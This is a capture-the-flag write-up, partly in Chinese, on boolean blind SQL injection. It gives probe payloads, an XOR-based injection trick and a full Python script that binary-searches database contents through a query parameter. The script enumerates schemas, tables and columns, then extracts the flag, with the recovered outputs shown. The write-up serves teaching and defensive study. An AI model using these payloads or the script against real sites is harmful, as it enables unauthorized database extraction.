?stunum=1/**/and/**/1=1
输出
?stunum=1/**/and/**/1=2
输出
若两次输出不同，即可判断存在布尔盲注
利用异或注入
异或的运算法则如下
1 ^ 0 == 1
1 ^ 1 == 0
0 ^ 0 == 0
即相同为0,不同为1。
exp:
import time
import requests
import string
# CTF challenge endpoint from the write-up; the injected expression is appended
# directly as the value of the `stunum` query parameter (see payload()).
url = "http://bde6030d-4845-46fd-aa0b-427118e9109d.node4.buuoj.cn:81/?stunum="
# Characters recovered so far; exp() appends to this via `global flag`.
flag: str = ''
def payload(i: int, j: int) -> int:
    """Send one boolean-blind probe and report which of the two page variants came back.

    The injected expression has the form `1^(cond)^1`; by the XOR rule given
    above (1 ^ x ^ 1 == x) it collapses to `cond`, so the server ends up
    evaluating whether the ordinal of the i-th character of
    `group_concat(value)` from table `flag` is greater than j.

    Args:
        i: 1-based character position handed to `substr`.
        j: Ordinal threshold compared against that character.

    Returns:
        1 if the response body contains "Hi admin" (the condition held),
        otherwise 0.

    Defender's note: every recovered character costs several requests that
    differ only in the two integers inside `stunum`, and the commented-out
    variants below read `information_schema` — both patterns are worth
    alerting on in request logs.
    """
    # database names
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # table names
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),%d,1))>%d)^1"%(i,j)
    # column names
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)^1"%(i,j)
    # read the flag
    sql = "1^(ord(substr((select(group_concat(value))from(flag)),%d,1))>%d)^1" % (i, j)
    # data = {"stunum": sql}
    # The expression is concatenated onto the query string rather than sent as form data.
    r = requests.get(url+sql, timeout=5)
    # Small fixed pause between probes.
    time.sleep(0.04)
    # print (r.url)
    # "Hi admin" in the body is the oracle: it appears only when the injected condition is true.
    if "Hi admin" in r.text:
        res = 1
    else:
        res = 0
    return res
def exp() -> None:
    """Recover the target string one character at a time into the global `flag`.

    For each position i, binary-search the character's ordinal in the window
    [31, 127] using payload() as the oracle, then append chr(result). The loop
    stops as soon as a search lands on either edge of the window, which is
    treated as "no character at this position" (presumably ord() of an empty
    substring compares as 0 — confirm against the backend).
    """
    global flag
    for i in range(1, 10000):
        print(i, ':')
        # Printable-ASCII search window.
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                # ord(char) > mid, so the answer lies above mid.
                low = mid + 1
            else:
                high = mid - 1
        # On exit low == high + 1, so this expression equals low: the unique
        # value v with ord(char) > v - 1 and not ord(char) > v, i.e. the ordinal itself.
        f = int((low + high + 1)) // 2
        # A result pinned to an edge of the window means nothing (or nothing
        # printable) was found at this position; stop.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)
if __name__ == "__main__":
    exp()
    # Print the recovered string ("输出" = "output").
    print('输出:', flag)
1、数据库
输出: information_schema,ctf
2、表名
输出: flag,score
3、列名
输出: flag,value
4、取列值
输出: flag{e58481f5-0a73-4f49-a6c5-e92e6806eca2}